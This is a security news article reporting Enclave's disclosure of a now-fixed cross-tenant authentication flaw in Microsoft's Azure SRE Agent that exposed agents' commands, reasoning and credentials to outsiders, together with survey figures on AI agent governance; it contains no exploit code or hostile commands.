Agentic AI
,
Artificial Intelligence & Machine Learning
,
Next-Generation Technologies & Secure Development
Outsiders Could Exploit Misconfig to Stream Commands, Credentials
Any outsider with a free Microsoft cloud account and a short script could watch another company’s artificial intelligence operations agent in real time – reading its commands, its reasoning and its passwords – without the company ever knowing.
See Also: AI Security Risks Rise With Agentic Systems
Microsoft’s automated cloud operations Azure SRE Agent connects to a company’s Azure environment and acts as a round-the-clock operations partner. It watches for alerts, diagnoses outages and executes fixes on behalf of IT teams by restarting services, scaling resources, rolling back software deployments and running command-line instructions across a company’s cloud infrastructure. It has access to source code, logs, system metrics and integrations with incident management platforms like PagerDuty and ServiceNow. Microsoft’s own Azure App Service team cut its average incident resolution time from 40 hours to three minutes using it.
The agent streams all its activity in real time through a communication channel. Connecting to it requires a digital token. Researchers at Enclave found that the system issuing the tokens was configured to serve users across all Microsoft cloud tenants. Any Azure account from any company worldwide could obtain a valid token from Microsoft’s own authentication infrastructure. The channel then checked whether the token was legitimate, but did not verify whether the account holding it belonged to the company it was attempting to observe. All activity was broadcast to all connected parties with no filtering by identity.
The scope of exposure included every message a user sent to the agent and its response. Also included was the agent’s step-by-step reasoning about a company’s infrastructure before it took action – along with every command it ran, including the full details of those commands, and every command’s output, including credentials. In the researchers’ test environment, a routine task returned deployment credentials for live web applications in plain text, flowing straight through the open connection.
What made the flaw hard to catch was the absence of records on the victim’s side since the only log of the connection existed in the attacker’s own computer. Organizations whose agents were accessed had no way to detect it at the time, investigate it afterward or determine what an outsider saw.
The attack required minimal resources: one free Azure account, the target agent’s web address that usually follows a predictable format and about 15 lines of code. Every deployed instance of Azure SRE Agent was potentially reachable this way.
Enclave reported to Microsoft’s Security Response Center, which confirmed it, rated it critical and fixed it on the server side. The flaw is tracked as CVE-2026-32173 and carries as CVSS score of 8.6. Microsoft’s advisory classifies it as improper authentication, meaning the system failed to adequately verify who was connecting before granting access. Microsoft applied a fix directly to its own infrastructure.
The case comes at a moment when the security industry is raising concerns about AI agents. A study by the Cloud Security Alliance found that 53% of organizations have had AI agents exceed intended permissions. The organization’s research, commissioned by security firm Zenity, found that rapid AI adoption routinely outpaces governance controls.
A report from API platform company Gravitee, which surveyed over 900 executives and technical practitioners, found that while more than 80% of technical teams have moved past planning into active testing or production deployment of AI agents, only 14.4% sent those agents into production with full security and IT approval.
Click Here For The Original Source.
